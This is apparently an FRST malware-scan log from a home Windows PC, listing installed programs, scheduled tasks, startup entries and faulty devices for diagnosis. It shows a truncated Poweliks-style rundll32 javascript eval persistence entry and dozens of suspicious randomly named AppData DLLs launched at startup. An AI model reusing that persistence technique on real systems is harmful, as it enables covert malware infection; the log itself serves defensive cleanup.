Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Xvid 1.2.1 final uninstall (HKLM-x32\...\Xvid_is1) (Version: 1.2 - Xvid team (Koepi))
ZoneAlarm LTD Toolbar (HKLM\...\ZoneAlarm LTD Toolbar) (Version:  - Check Point Software Technologies)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-764796802-3477399101-373240229-1000_Classes\CLSID\{1FD1FE74-9E3C-4C1C-AEEB-AAB592AD770F}\localserver32 -> C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
CustomCLSID: HKU\S-1-5-21-764796802-3477399101-373240229-1000_Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32 -> C:\Windows\system32\shell32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-764796802-3477399101-373240229-1000_Classes\CLSID\{8B9F5BF4-0407-4BB2-9FED-4C0372DABD00}\localserver32 -> C:\Users\Hogg\AppData\Local\Facebook\Video\Skype\FacebookVideoCallingProxy.exe (Skype Limited)
CustomCLSID: HKU\S-1-5-21-764796802-3477399101-373240229-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

30-08-2014 19:21:28 Scheduled Checkpoint
31-08-2014 09:57:32 Scheduled Checkpoint
01-09-2014 13:37:52 Scheduled Checkpoint
02-09-2014 01:41:17 Scheduled Checkpoint
02-09-2014 19:32:10 Scheduled Checkpoint
03-09-2014 16:16:12 Scheduled Checkpoint
04-09-2014 18:34:24 Scheduled Checkpoint
05-09-2014 22:15:07 Scheduled Checkpoint
06-09-2014 18:39:33 Scheduled Checkpoint
07-09-2014 15:53:08 Scheduled Checkpoint
08-09-2014 13:53:39 Scheduled Checkpoint
09-09-2014 16:25:34 Scheduled Checkpoint
10-09-2014 14:21:19 Scheduled Checkpoint
10-09-2014 15:08:21 Device Driver Package Install: Apple, Inc. Universal Serial Bus controllers
11-09-2014 17:05:18 Scheduled Checkpoint
12-09-2014 22:45:41 PC Helper 360 Backup
13-09-2014 00:33:39 PC Helper 360 Backup
13-09-2014 02:20:36 Configured Microsoft Flight Simulator X
13-09-2014 14:48:15 PC Helper 360 Backup
13-09-2014 14:54:04 PC Helper 360 Backup
13-09-2014 16:52:37 Windows Update
14-09-2014 13:33:22 Windows Update
14-09-2014 15:00:34 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 06:34 - 2006-09-18 15:37 - 00000761 ____N C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1             localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {046235D7-ABC4-4A57-BCDF-9950CCB97EC3} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {0AEAFAF6-F116-4A60-AFB4-C8B755A6E975} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {0BE36494-68E4-4DD3-AA6D-F9AE957FF7E8} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {11FB66F9-3D27-4B87-8512-2020F78637F0} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000UA => C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-11] (Facebook Inc.)
Task: {1445A45F-6406-42CA-B01F-2890449C7669} - System32\Tasks\ParetoLogic Update Version3 => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe [2013-05-23] ()
Task: {14968784-441D-4462-BD49-87F12C2E8B7E} - System32\Tasks\ParetoLogic Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll" RunUns
Task: {15FBC6DE-1AE2-4A9A-9548-DC898594B768} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - Hogg => C:\Program Files\Windows Calendar\WinCal.exe [2008-01-20] (Microsoft Corporation)
Task: {192DDA2D-5815-47B8-983F-65744FEEC03A} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {19A25ADD-EB0E-4B63-9BB4-0256C1F2DE3C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-12] (Adobe Systems Incorporated)
Task: {1A64817C-842B-4F0F-889D-C8FEAA0A544E} - System32\Tasks\HP Health Check => c:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe [2008-12-04] (Hewlett-Packard)
Task: {236F269B-B84B-487D-B318-62CFE53D1EC9} - System32\Tasks\{FF904900-4DB3-4108-9C40-7F4EBC13B026} => C:\Program Files (x86)\Skype\Phone\Skype.exe
Task: {254095AE-FB97-48EA-94A5-D8BF2AB79714} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {43177A72-9692-414D-BD40-89655D224F64} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2009-08-13] (Google Inc.)
Task: {5AA23D62-2A27-43A5-9C6A-C36C8F7CA953} - System32\Tasks\Foresight Software Update3 => C:\Program Files (x86)\Common Files\Foresight Software\UUS3\Update3.exe [2013-06-27] (Foresight Software)
Task: {5E09E208-D7B3-4EDE-95E5-54F9427C5A47} - System32\Tasks\PC Helper 360 => C:\Program Files (x86)\Foresight Software\PC Helper 360\pch360.exe [2013-06-27] (Foresight Software)
Task: {5F0436EF-91C8-4D30-830A-1914666EC668} - System32\Tasks\Norton Security Scan for Hogg => C:\Program Files (x86)\Norton Security Scan\Engine\4.1.0.28\Nss.exe [2014-08-21] (Symantec Corporation)
Task: {659A76BD-A318-4E0D-A540-EE24A5125631} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {6AB8A520-A8BF-4988-9C70-3E747EDA3943} - System32\Tasks\PCDRScheduledMaintenance => C:\Program Files\PC-Doctor for Windows\pcdr5cuiw32.exe [2009-02-02] (PC-Doctor, Inc.)
Task: {72E52533-D4C0-4086-B9B2-36C85A773AE3} - System32\Tasks\ParetoLogic Update Version3 Startup Task => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe [2013-05-23] ()
Task: {7C638E5B-ECE5-4424-A7E5-2C913CA682E9} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {94C5ABFA-CF8E-4B90-88FF-EBBCF6A61742} - \TidyNetwork Update No Task File <==== ATTENTION
Task: {A4A94294-EA2E-4306-A9B3-555A8BA2C71C} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {A9F02FCC-7677-4790-8270-E5175329EC8C} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2013-08-14] (RealNetworks, Inc.)
Task: {AAE69740-1F27-4AAD-9BD7-EC4965923D68} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\WSCStub.exe [2014-04-29] (Symantec Corporation)
Task: {B6C880AD-FE60-4EF5-B964-EADA7D686575} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {B834D3C9-1C43-4CEA-8EF2-121D68F30C7A} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {C3CEE5CD-17EB-4AED-95FD-765D90301409} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {C7E6CBC5-43A1-49BD-B598-22881AFA30C4} - System32\Tasks\Foresight Software Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\Foresight Software\UUS3\UUS3.dll" RunUns
Task: {CCB1B7A6-FC0A-4B85-A6B6-303F7743A868} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {D604FF80-2A0F-48AC-81CE-08D69854368C} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000Core => C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-11] (Facebook Inc.)
Task: {DB9A1673-9332-43DA-9CD5-18A18F20AF0B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {DD3D3C5F-0306-4B71-B1FC-FB3E38DF6EA2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2009-08-13] (Google Inc.)
Task: {E1FF3704-6910-4199-814D-33817990BC18} - System32\Tasks\Google Software Updater => C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2012-08-14] (Google)
Task: {E6CEDF7F-B279-4590-9ADC-20A329F3BD22} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {E91D6474-70CC-42BE-80FF-8BED8AF557ED} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {EBB0C16C-A511-45BB-96E5-FAE2A783E2AB} - System32\Tasks\Privacy Controls_{028B732D-E038-11E2-BEAE-EE3C3BB92F93} => C:\Program Files (x86)\ParetoLogic\Privacy Controls\Pareto_PC.exe [2013-05-23] (ParetoLogic Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000Core.job => C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000UA.job => C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\Foresight Software Registration3.job => C:\Program Files (x86)\Common Files\Foresight Software\UUS3\UUS3.dll
Task: C:\Windows\Tasks\Foresight Software Update3.job => C:\Program Files (x86)\Common Files\Foresight Software\UUS3\Update3.exe
Task: C:\Windows\Tasks\Google Software Updater.job => C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Norton Security Scan for Hogg.job => C:\PROGRA~2\NORTON~2\Engine\410~1.28\Nss.exe
Task: C:\Windows\Tasks\ParetoLogic Registration3.job => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll
Task: C:\Windows\Tasks\ParetoLogic Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe
Task: C:\Windows\Tasks\ParetoLogic Update Version3.job => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe
Task: C:\Windows\Tasks\PC Helper 360.job => C:\Program Files (x86)\Foresight Software\PC Helper 360\pch360.exe
Task: C:\Windows\Tasks\PCDRScheduledMaintenance.job => C:\Program Files\PC-Doctor for Windows\pcdr5cuiw32.exe
Task: C:\Windows\Tasks\Privacy Controls_{028B732D-E038-11E2-BEAE-EE3C3BB92F93}.job => C:\Program Files (x86)\ParetoLogic\Privacy Controls\Pareto_PC.exe

==================== Loaded Modules (whitelisted) =============

2013-08-14 15:19 - 2013-08-14 15:19 - 00039056 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
2014-08-11 23:19 - 2014-08-11 23:19 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
2010-03-10 22:32 - 2010-03-10 22:32 - 00026112 _____ () C:\Windows\system32\atitmp64.dll
2013-08-19 09:43 - 2014-08-25 16:17 - 02640408 _____ () C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe
2014-04-23 16:05 - 2014-04-23 16:05 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-04-23 16:04 - 2014-04-23 16:04 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-08-11 23:19 - 2014-08-11 23:19 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\log4cplusU.dll
2014-05-01 14:09 - 2012-05-30 08:51 - 00699280 ____R () C:\PROGRAM FILES (X86)\NORTON INTERNET SECURITY\ENGINE\20.5.0.28\wincfi39.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:238AA907

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\89540304.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\89540304.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: AdobeActiveFileMonitor7.0 => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: DTSRVC => 2
MSCONFIG\Services: FLEXnet Licensing Service => 3
MSCONFIG\Services: GameConsoleService => 3
MSCONFIG\Services: gupdate1ca1c3cefd8b09c => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 2
MSCONFIG\Services: HP Health Check Service => 2
MSCONFIG\Services: HPBtnSrv => 2
MSCONFIG\Services: IAANTMON => 2
MSCONFIG\Services: IDriverT => 3
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: LightScribeService => 2
MSCONFIG\Services: MBAMScheduler => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: McComponentHostService => 3
MSCONFIG\Services: MyWebSearchService => 2
MSCONFIG\Services: PdiService => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RosettaStoneLtdController => 2
MSCONFIG\Services: sprtsvc_ncnetworksdm => 2
MSCONFIG\Services: tgsrvc_ncnetworksdm => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^PictureMover.lnk => C:\Windows\pss\PictureMover.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Hogg^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: adiat =>  "C:\Users\Hogg\AppData\Roaming\adiat.dll",SetEncoding
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: antfsc =>  "C:\Users\Hogg\AppData\Roaming\antfsc.dll",_InputHook
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: bcvet =>  "C:\Users\Hogg\AppData\Roaming\bcvet.dll",vLoadModuleW
MSCONFIG\startupreg: CLMLServer for HP TouchSmart => "c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe"
MSCONFIG\startupreg: crutmi =>  "C:\Users\Hogg\AppData\Roaming\crutmi.dll",mpegInGetLastErrString
MSCONFIG\startupreg: cverpa =>  "C:\Users\Hogg\AppData\Roaming\cverpa.dll",vIsModuleLoaded
MSCONFIG\startupreg: cwipn =>  "C:\Users\Hogg\AppData\Roaming\cwipn.dll",GetLocals
MSCONFIG\startupreg: DATAMNGR => C:\PROGRA~2\SEARCH~3\Datamngr\DATAMN~1.EXE
MSCONFIG\startupreg: despr =>  "C:\Users\Hogg\AppData\Roaming\despr.dll",GetMax
MSCONFIG\startupreg: dimsb =>  "C:\Users\Hogg\AppData\Roaming\dimsb.dll",ErrWithUnicodeFilename
MSCONFIG\startupreg: dmenl =>  "C:\Users\Hogg\AppData\Roaming\dmenl.dll",LocalsToFast
MSCONFIG\startupreg: dpapig =>  "C:\Users\Hogg\AppData\Roaming\dpapig.dll",PendingDeprecationWarning
MSCONFIG\startupreg: DT HPW => "C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DT_startup.exe" -HPW
MSCONFIG\startupreg: DVDAgent => "c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe"
MSCONFIG\startupreg: ehTray.exe => C:\Windows\ehome\ehTray.exe
MSCONFIG\startupreg: Facebook Update => "C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: gized =>  "C:\Users\Hogg\AppData\Roaming\gized.dll",State_ThreadHead
MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
MSCONFIG\startupreg: hcexs =>  "C:\Users\Hogg\AppData\Roaming\hcexs.dll",BadInternalCall
MSCONFIG\startupreg: hecis =>  "C:\Users\Hogg\AppData\Roaming\hecis.dll",set_rgb_to_gray
MSCONFIG\startupreg: hecphi =>  "C:\Users\Hogg\AppData\Roaming\hecphi.dll",CallObjectWithKeywords
MSCONFIG\startupreg: HP Health Check Scheduler => c:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
MSCONFIG\startupreg: HP Remote Software => C:\Program Files\Hewlett-Packard\HP Remote\HP REMOTE V1.0.5.exe
MSCONFIG\startupreg: hpsysdrv => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe
MSCONFIG\startupreg: IAAnotif => "C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe"
MSCONFIG\startupreg: irypsr =>  "C:\Users\Hogg\AppData\Roaming\irypsr.dll",Check
MSCONFIG\startupreg: ISUSPM => "C:\Program Files (x86)\Common Files\InstallShield\UpdateService\ISUSPM.exe" -scheduler
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: lesro =>  "C:\Users\Hogg\AppData\Roaming\lesro.dll",get_image_width
MSCONFIG\startupreg: mdetse =>  "C:\Users\Hogg\AppData\Roaming\mdetse.dll",Property_Type
MSCONFIG\startupreg: mdevm =>  "C:\Users\Hogg\AppData\Roaming\mdevm.dll",BytesWarning
MSCONFIG\startupreg: mdlobt =>  "C:\Users\Hogg\AppData\Roaming\mdlobt.dll",ImagAsDouble
MSCONFIG\startupreg: mdplt =>  "C:\Users\Hogg\AppData\Roaming\mdplt.dll",List_Append
MSCONFIG\startupreg: mecpst =>  "C:\Users\Hogg\AppData\Roaming\mecpst.dll",CreateThumbnailFromFile
MSCONFIG\startupreg: mgfrob =>  "C:\Users\Hogg\AppData\Roaming\mgfrob.dll",InPlaceOr
MSCONFIG\startupreg: miasc =>  "C:\Users\Hogg\AppData\Roaming\miasc.dll",RuntimeWarning
MSCONFIG\startupreg: Microsoft Default Manager => "c:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: mrdxat =>  "C:\Users\Hogg\AppData\Roaming\mrdxat.dll",SelfIter
MSCONFIG\startupreg: mredrv =>  "C:\Users\Hogg\AppData\Roaming\mredrv.dll",Int_FromString
MSCONFIG\startupreg: msvpr =>  "C:\Users\Hogg\AppData\Roaming\msvpr.dll",XSet
MSCONFIG\startupreg: mtfxp =>  "C:\Users\Hogg\AppData\Roaming\mtfxp.dll",FromMemory
MSCONFIG\startupreg: musdpy =>  "C:\Users\Hogg\AppData\Roaming\musdpy.dll",Int_ClearFreeList
MSCONFIG\startupreg: NCNETWORKSDM => "C:\Program Files (x86)\NCNETWORKSDM\bin\sprtcmd.exe" /P NCNETWORKSDM
MSCONFIG\startupreg: nedes =>  "C:\Users\Hogg\AppData\Roaming\nedes.dll",_Readline
MSCONFIG\startupreg: nedeti =>  "C:\Users\Hogg\AppData\Roaming\nedeti.dll",set_background
MSCONFIG\startupreg: nhadri =>  "C:\Users\Hogg\AppData\Roaming\nhadri.dll",GetBuffer
MSCONFIG\startupreg: nhetwl =>  "C:\Users\Hogg\AppData\Roaming\nhetwl.dll",Long_AsLong
MSCONFIG\startupreg: nobapl =>  "C:\Users\Hogg\AppData\Roaming\nobapl.dll",write_rows
MSCONFIG\startupreg: nstap =>  "C:\Users\Hogg\AppData\Roaming\nstap.dll",Module_GetFilename
MSCONFIG\startupreg: ouipc =>  "C:\Users\Hogg\AppData\Roaming\ouipc.dll",SyntaxWarning
MSCONFIG\startupreg: oxpisr =>  "C:\Users\Hogg\AppData\Roaming\oxpisr.dll",permit_empty_plte
MSCONFIG\startupreg: pepsv =>  "C:\Users\Hogg\AppData\Roaming\pepsv.dll",Dir
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: rapsc =>  "C:\Users\Hogg\AppData\Roaming\rapsc.dll",SourceStopv
MSCONFIG\startupreg: seauib =>  "C:\Users\Hogg\AppData\Roaming\seauib.dll",convert_to_rfc1123
MSCONFIG\startupreg: shosec =>  "C:\Users\Hogg\AppData\Roaming\shosec.dll",GetDomainDNSNameForDomain
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: skcof =>  "C:\Users\Hogg\AppData\Roaming\skcof.dll",PreprocessShaderFromResourceA
MSCONFIG\startupreg: SmartMenu => %ProgramFiles%\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
MSCONFIG\startupreg: splet =>  "C:\Users\Hogg\AppData\Roaming\splet.dll",FromLong
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: TSMAgent => "c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\TSMAgent.exe"
MSCONFIG\startupreg: UCam_Menu => "C:\Program Files (x86)\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\CyberLink\YouCam" UpdateWithCreateOnce "Software\CyberLink\YouCam\2.0"
MSCONFIG\startupreg: UpdateLBPShortCut => "c:\Program Files (x86)\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\CyberLink\LabelPrint" UpdateWithCreateOnce "Software\CyberLink\LabelPrint\2.5"
MSCONFIG\startupreg: UpdateP2GoShortCut => "c:\Program Files (x86)\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\CyberLink\Power2Go" UpdateWithCreateOnce "SOFTWARE\CyberLink\Power2Go\6.0"
MSCONFIG\startupreg: UpdatePDIRShortCut => "c:\Program Files (x86)\CyberLink\PowerDirector\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\CyberLink\PowerDirector" UpdateWithCreateOnce "SOFTWARE\CyberLink\PowerDirector\7.0"
MSCONFIG\startupreg: UpdatePSTShortCut => "c:\Program Files (x86)\CyberLink\CyberLink DVD Suite Deluxe\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\CyberLink\CyberLink DVD Suite Deluxe" UpdateWithCreateOnce "Software\CyberLink\PowerStarter"
MSCONFIG\startupreg: utheui =>  "C:\Users\Hogg\AppData\Roaming\utheui.dll",WriteLongToFile
MSCONFIG\startupreg: wadmxp =>  "C:\Users\Hogg\AppData\Roaming\wadmxp.dll",RestoreThread
MSCONFIG\startupreg: werop =>  "C:\Users\Hogg\AppData\Roaming\werop.dll",_Repeat
MSCONFIG\startupreg: winti =>  "C:\Users\Hogg\AppData\Roaming\winti.dll",GetBuiltins
MSCONFIG\startupreg: wlored =>  "C:\Users\Hogg\AppData\Roaming\wlored.dll",get_rowbytes

==================== Faulty Device Manager Devices =============

Name: Microsoft 6to4 Adapter #50
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #58
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #59
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #60
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #61
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #62
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #63
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

==================== Event log errors: =========================

Application errors:
==================
Error: (09/14/2014 09:21:32 AM) (Source: Application Hang) (EventID: 1002) (User: )
